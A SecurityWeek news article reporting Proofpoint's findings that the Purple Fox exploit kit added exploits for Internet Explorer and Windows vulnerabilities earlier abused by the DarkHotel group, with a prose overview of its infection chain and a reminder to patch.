Connect with us

Hi, what are you looking for?



Purple Fox Exploit Kit Targets Vulnerabilities Linked to DarkHotel Group

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

Initially detailed in September 2018, the EK was designed for the distribution of the Purple Fox Trojan/Rootkit. Previously, the Trojan was being disseminated through the RIG EK, but its operators were likely looking into cutting down costs, Proofpoint’s security researchers note.

In recent distribution campaigns, the Purple Fox EK has been leveraging exploits targeting CVE-2020-0674 (a scripting engine memory corruption in Internet Explorer) and CVE-2019-1458 (a local privilege elevation in Windows), two vulnerabilities that Microsoft addressed in February 2020 and December 2019, respectively.

Before patches were released for these security bugs, however, both were observed being abused in attacks associated with the DarkHotel threat group, which is believed to be linked to the South Korean government. Last year, the threat actor also targeted a Chrome zero-day as part of Operation WizardOpium.

Purple Fox is believed to have affected tens of thousands of users, initially dropping crypto-miners onto compromised machines. Over time, however, it received several improvements, such as the addition of rootkit code and the recently added exploits.

Analysis of the infection chain has revealed the use of a script that first checks the operating system on the target machine to select the method for executing the next stage payload (via msiexec.exe).

It would also attempt to elevate privileges using exploits for the CVE-2018-8120 and CVE-2015-1701 vulnerabilities impacting the Win32k multiuser driver. Recent versions of the script also include an exploit for CVE-2019-1458, Proofpoint reveals.

Although not as prevalent as they used to be, exploit kits continue to be present on the threat landscape and they are also regularly updated with exploits for more recent vulnerabilities, to improve efficiency, something that Purple Fox EK developers are attempting as well.

Advertisement. Scroll to continue reading.

The exploits added to the EK’s arsenal, however, target vulnerabilities that have been addressed via security updates months ago, which underlines the importance of patching computers in a timely manner.

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business. In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism ‘in-house’ also enables greater control over what the EK actually loads,” Proofpoint also notes.

Related: Microsoft Patches IE Zero-Day, 98 Other Vulnerabilities

Related: Microsoft Patches Windows Zero-Day Exploited in Korea-Linked Attacks

Related: New ‘Lord’ Exploit Kit Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Gain valuable insights from industry professionals who will help guide you through the intricacies of industrial cybersecurity.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...


A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...